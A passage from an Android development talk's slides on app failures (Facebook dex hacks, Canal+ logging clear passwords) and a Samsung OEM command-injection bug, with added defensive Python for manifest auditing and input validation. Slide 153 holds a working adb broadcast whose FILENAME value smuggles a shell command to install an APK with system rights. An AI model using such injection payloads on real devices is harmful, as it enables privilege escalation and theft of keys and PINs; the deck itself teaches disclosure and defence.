  96. 96. FACEBOOK Under the hood Too much methods LinearAlloc buffer overflow March 2013 Solution is to divide the code into several dex files And load it on demand
  97. 97. FACEBOOK Under the hood March 2013 Facebook app source code was not enough modular to allow this at application level “Too many of our classes are accessed directly by the Android framework” They had to do it at system level, thanks to reflection “We needed to inject our secondary dex files directly into the system class loader”
  98. 98. FACEBOOK « More backwards compatibility for Facebook. Another day, another private field accessed. »
  99. 99. FACEBOOK « More backwards compatibility for Facebook. Another day, another private field accessed. » GIT COMMENT ANDROID SOURCE CODE January 2013
  100. 100. FACEBOOK Android source code - DexPathList.java Commit January 2013 /** * List of dex/resource (class path) elements. * Should be called pathElements, but the Facebook app uses reflection * to modify 'dexElements' (http://b/7726934). */ private final Element[] dexElements;
  101. 101. FACEBOOK Android code review January 2013 Patch set 2 lets facebook start (at least judging by logcat output) After manual testing facebook starts, though i don't have an account.
  102. 102. FACEBOOK This was not enough They finally patched Dalvik VM Using native hot fix to change the LinearAlloc buffer size
  103. 103. FACEBOOK I feel dirty
  104. 104. FACEBOOK In a nutshell Modularity saves lifes Google seems to test some popular apps during integration So they don’t break the system apps Google hires engineers when Facebook hires sculptors Inspired by Sayo Oladeji
  105. 105. 07 FACEBOOK EPISODE 2
  106. 106. FACEBOOK HOME A lock screen
  107. 107. FACEBOOK HOME Several services supported
  108. 108. FACEBOOK HOME And a launcher
  109. 109. FACEBOOK HOME
  110. 110. FACEBOOK HOME The problem The launcher is too simple No folder No widget No dock (during first months) It used to be mandatory Lockscreen + Launcher
  111. 111. FACEBOOK HOME
  112. 112. FACEBOOK HOME
  113. 113. FACEBOOK HOME Opens default launcher
  114. 114. FACEBOOK HOME Spot the odd one out
  115. 115. FACEBOOK HOME Conclusion Keep the platform spirit To override native OS elements you need first to implement all the basic features the user use to use Identify your weakest points And prepare how to limit their impact
  116. 116. 08 CANAL PLUS
  117. 117. CANAL+ TOUCH This is the logcat Request: https://canalURL.com/1.5/getThmChannel.php... Request: https://canalURL.com/1.5/getProgramThm.php... Request: https://canalURL.com/1.4/programRediff.php... Request: https://canalURL.com/1.5/VOD.php?release=1... json response : {"token":{"url":"http://download.... Request: https://canalURL.com/1.4/getChannel.php?SE... json response: {"token":{"url":"https://canalURL.... Request: https://canalURL.com/1.5/guideTvChannel.ph... Request: https://canalURL.com/1.5/programInfo.php?U... Request: https://canalURL.com/1.5/myTv.php?release=...
  118. 118. CANAL+ TOUCH Chatty logs Make reverse engineering easier HTTPS connexion PHP backend All the URLS and parameters are known Some of the response are known too
  119. 119. CANAL+ TOUCH Chatty logs Can bring really big security breaches
  120. 120. CANAL+ TOUCH This is always the logcat https://canalURL.com/1.5/authentification.php? login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]...
  121. 121. CANAL+ TOUCH This is always the logcat Wait login=[MY_LOGIN]&pass=[MY_CLEAR_PASSWORD]... WHAT ?! https://canalURL.com/1.5/authentification.php?
  122. 122. CANAL+ TOUCH Shut the fuck up! Control your log output Easy method with BuildConfig.DEBUG Never send clear password over the network NEVAAAAAAA!!!!
  123. 123. CANAL+ TOUCH public static final boolean SHOW_LOG = BuildConfig.DEBUG; public static void d(final String tag, final String msg) { if (SHOW_LOG) Log.d(tag, msg); } Avoid the leak, easily
  124. 124. CANAL+ TOUCH public static final boolean SHOW_LOG = BuildConfig.DEBUG; public static void d(final String tag, final String msg) { if (SHOW_LOG) Log.d(tag, msg); } Avoid the leak, easily And test it during QA
  125. 125. 09 OEM SOFTWARE
  126. 126. OEM SOFTWARE The Android framework Many APKs Implement the features Often have system access To use low level features
  127. 127. OEM SOFTWARE Open bar?
  128. 128. OEM SOFTWARE Let’s see
  129. 129. OEM SOFTWARE Android OEM applications (in)security Talk by ANDRE MOULU Quarkslab
  130. 130. OEM SOFTWARE Methodology Reverse engineering Using Androguard A custom result environment Manifest analysis Check for sensitive API usage Diff between OS version (to find patches)
  131. 131. OEM SOFTWARE The results on Samsung devices 12 vulnerabilities found Leak personal information Access non-permited features Silent SMS control Code injection ... Similar vulnerabilities on many constructors
  132. 132. OEM SOFTWARE Gimme more!
  133. 133. OEM SOFTWARE Search for sharedUserId = system Sensitive user ID Command execution Sensitive usage Find serviceModeApp.apk = Very sensitive app !
134. OEM SOFTWARE
Receiver declared twice:

    <receiver name=".FTATDumpReceiver">
        <intent-filter>
            <action name="com.android.sec.FTAT_DUMP"></action>
        </intent-filter>
    </receiver>
    <receiver name=".FTATDumpReceiver"
              permission="...servicemodeapp.permission.KEYSTRING">
        <intent-filter>
            <action name="com.android.sec.FAILDUMP"></action>
        </intent-filter>
    </receiver>

135. OEM SOFTWARE
A permission is asked for the FAILDUMP action (second declaration)
136. OEM SOFTWARE
No permission needed for the FTAT_DUMP action (first declaration)!!
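The manifest-analysis step of the methodology above can be scripted. This is an added example written for this page, not part of the talk or of Androguard: it parses a manifest and flags the three patterns the slides point at (shared system UID, a receiver reachable without any permission, one class declared twice with different protection). The embedded manifest is constructed from the slide; the package name and permission prefix are placeholders because the talk elides them.

```python
import xml.etree.ElementTree as ET

A = "{http://schemas.android.com/apk/res/android}"  # android: attribute namespace

# Constructed manifest modelled on the slide. Package and permission prefix are
# placeholders (elided in the talk); android.uid.system is the system shared UID.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="example.servicemodeapp" android:sharedUserId="android.uid.system">
  <application>
    <receiver android:name=".FTATDumpReceiver">
      <intent-filter><action android:name="com.android.sec.FTAT_DUMP"/></intent-filter>
    </receiver>
    <receiver android:name=".FTATDumpReceiver"
              android:permission="example.servicemodeapp.permission.KEYSTRING">
      <intent-filter><action android:name="com.android.sec.FAILDUMP"/></intent-filter>
    </receiver>
  </application>
</manifest>"""

def audit_receivers(manifest_xml):
    """Return one finding per risky pattern: a shared (system) UID, a receiver
    reachable by any app (intent-filter present, so exported by default, and no
    android:permission), and one class declared twice with different protection."""
    root = ET.fromstring(manifest_xml)
    findings = []
    shared_uid = root.get(A + "sharedUserId")
    if shared_uid:
        findings.append(f"manifest: sharedUserId={shared_uid} (sensitive user ID)")
    seen = {}  # receiver name -> permission of its first declaration
    for rcv in root.iter("receiver"):
        name = rcv.get(A + "name")
        perm = rcv.get(A + "permission")
        exported = rcv.get(A + "exported")
        actions = [a.get(A + "name") for a in rcv.iter("action")]
        # Before API 31, a component with an intent-filter is exported unless
        # android:exported="false" is set explicitly.
        reachable = exported == "true" or (exported is None and bool(actions))
        if reachable and not perm:
            findings.append(f"{name}: exported without permission, actions={actions}")
        if name in seen and seen[name] != perm:
            findings.append(f"{name}: declared twice with different permission")
        seen.setdefault(name, perm)
    return findings

if __name__ == "__main__":
    for finding in audit_receivers(SAMPLE_MANIFEST):
        print(finding)
```

Run it over the decoded AndroidManifest.xml of each system APK (apktool or Androguard can extract it) and review every receiver it lists before looking at any code.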
137. OEM SOFTWARE
We read the FTATDumpReceiver source code:

    public void onReceive(Context paramContext, Intent paramIntent) {
        String str1 = paramIntent.getAction();
        if (str1.equals("com.android.sec.FTAT_DUMP")) {
            String str3 = "FTAT_" + paramIntent.getStringExtra("FILENAME");
            [...]
            String str9 = str8 + [...]
            Intent localIntent2 = new Intent(paramContext, FTATDumpService.class);
            localIntent2.putExtra("FILENAME", str9);
            paramContext.startService(localIntent2);
        }
        [...]
    }

138. to 143. OEM SOFTWARE
Walking through the same code:
- Intercepts the FTAT_DUMP action
- Concatenates the FILENAME extra to str3
- Other concatenations follow
- Prepares an intent to FTATDumpService
- Adds the final string to the intent
- Starts the FTATDumpService with our FILENAME parameter as extra
144. OEM SOFTWARE
We then read the FTATDumpService source code:

    public int onStartCommand(Intent paramIntent, ...) {
        final String str = paramIntent.getStringExtra("FILENAME");
        [...]
        new Thread(new Runnable() {
            public void run() {
                [...]
                if (FTATDumpService.this.DoShellCmd("dumpstate > /data/log/" + str + ".log"))
                    FTATDumpService.this.mHandler.sendEmptyMessage(1015);
                [...]
            }
        }).start();
        return 0;
    }

145. to 147. OEM SOFTWARE
Walking through the same code:
- Extracts the FILENAME extra to str
- Opens and starts a new thread
- Seems to "do a shell command" with our FILENAME parameter concatenated
148. OEM SOFTWARE
This is the DoShellCmd function:

    private boolean DoShellCmd(String paramString) {
        [...]
        String[] arrayOfString = new String[3];
        arrayOfString[0] = "/system/bin/sh";
        arrayOfString[1] = "-c";
        arrayOfString[2] = paramString;
        [...]
        Runtime.getRuntime().exec(arrayOfString).waitFor();
        [...]
        return true;
    }

149. to 151. OEM SOFTWARE
Walking through the same code:
- Creates a shell command and runs it
- And our FILENAME parameter is still not modified
- BINGO!
152. OEM SOFTWARE
Access to:
All permissions declared by system apps (156 in this case)
All files belonging to the system user
Wifi keys
Password, PIN, gesture storage
...
153. OEM SOFTWARE
A simple broadcast for the FTAT_DUMP action:

    $ adb shell am broadcast -a com.android.sec.FTAT_DUMP --es FILENAME '../../../../../dev/null; /system/bin/pm install an.apk; #'
    Broadcasting : Intent { act=com.android.sec.FTAT_DUMP (has extras) }
    Broadcast completed : result=0

154. to 156. OEM SOFTWARE
Walking through the same command:
- We declare the FILENAME argument
- We point the destination file to /dev/null
- We execute our system command
157. OEM SOFTWARE
Open bar!
158. OEM SOFTWARE
Moral of the story: it happens at application level
Look after your app's backdoors
Don't export local services
Use a strict permission model
Consider every input as a threat
Escape all sensitive parameters you receive
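What "consider every input as a threat" means for the FILENAME extra above, as an added example (not the Samsung code, nor code from the talk): the name is checked against a strict allowlist and confirmed to stay inside the log directory before it is quoted into the dumpstate command. Python stands in for the Java service; the function names and the 64-character limit are assumptions of this example.

```python
import posixpath
import re
import shlex

LOG_DIR = "/data/log"
# A log file stem only: no path separators, no spaces, no shell metacharacters.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")

def validate_filename(filename):
    """Return the full log path for a FILENAME extra, or raise ValueError.
    The regex rejects metacharacters; the path check is kept as a second,
    independent guarantee that the result stays inside LOG_DIR."""
    if filename is None or not SAFE_STEM.match(filename):
        raise ValueError("FILENAME must match [A-Za-z0-9_-]{1,64}")
    target = posixpath.normpath(posixpath.join(LOG_DIR, filename + ".log"))
    if posixpath.dirname(target) != LOG_DIR:
        raise ValueError("FILENAME escapes the log directory")
    return target

def build_dump_command(filename):
    """Build the argv for 'dumpstate > /data/log/<name>.log'. The redirection
    still needs sh -c, so the only untrusted part is validated first and then
    shell-quoted; the shell never sees the raw extra."""
    target = validate_filename(filename)
    return ["/system/bin/sh", "-c", "dumpstate > " + shlex.quote(target)]

def is_rejected(filename):
    """True when the extra would be refused (what the receiver should log and drop)."""
    try:
        validate_filename(filename)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    # Constructed inputs: one legitimate stem, one traversal attempt, one with a separator.
    for extra in ["FTAT_20130101", "../x", "a b; c"]:
        print(repr(extra), "rejected" if is_rejected(extra) else build_dump_command(extra))
```

Not exporting the service in the first place (the previous point of the slide) removes the attack surface entirely; the validation is what protects the component if it has to stay exported.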
159. Thank you for your time!
SLIDES
http://bit.ly/andbigfails
http://eyal.fr